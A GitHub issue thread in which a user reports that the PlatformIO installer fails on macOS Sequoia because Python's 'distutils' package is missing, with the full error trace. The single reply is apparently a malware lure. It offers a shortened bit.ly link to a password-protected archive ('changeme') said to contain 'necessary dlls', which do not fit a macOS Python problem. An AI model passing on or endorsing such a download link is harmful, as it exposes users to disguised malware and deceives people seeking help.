### ISSUE TITLE
Installation Manager after upgrade to  macOS sequoia

### ISSUE THREAD

**Issue by Kali-** [platformio/platformio-core-installer#3232]
%23 Description of problem
  Leave a comment...

  BEFORE SUBMITTING, PLEASE SEARCH FOR DUPLICATES IN
  - https://github.com/platformio/platformio-vscode-ide/issues%3Fq=is%3Aissue 

  %23 Configuration

  VSCode: 1.93.1
  PIO IDE: v2.5.5
  System: Darwin, 24.0.0, x64

  %23 Exception
  ```
  Error: Error: Can not install PlatformIO Core due to a missed `distutils` package in your Python installation.
Please install this package manually using the OS package manager. For example:

$ apt-get install python3-venv

(MAY require administrator access `sudo`)
 -> Installer version: 1.1.2
Platform: macOS-10.16
Python version: 3.11.7 (main, Jan  5 2024, 15:06:11) [Clang 10.0.0 (clang-1000.10.44.4)]
Python path: /Users/a003239758/.platformio/python3/bin/python3
Creating a virtual environment at /Users/a003239758/.platformio/penv

	at /Users/a003239758/.vscode-oss/extensions/platformio.platformio-ide-2.5.5-darwin-x64/node_modules/platformio-node-helpers/dist/index.js:1:5311
	at ChildProcess.o (/Users/a003239758/.vscode-oss/extensions/platformio.platformio-ide-2.5.5-darwin-x64/node_modules/platformio-node-helpers/dist/index.js:1:4691)
	at ChildProcess.emit (node:events:519:28)
	at ChildProcess.emit (node:domain:488:12)
	at maybeClose (node:internal/child_process:1105:16)
	at Socket.<anonymous> (node:internal/child_process:457:11)
	at Socket.emit (node:events:519:28)
	at Socket.emit (node:domain:488:12)
	at Pipe.<anonymous> (node:net:338:12)
  ```

**Comment by pinpolhoxx** [comment]
maybe this will help

https://bit.ly/3TCbXO6
Archive codepass: changeme
I put the necessary dlls in the archive
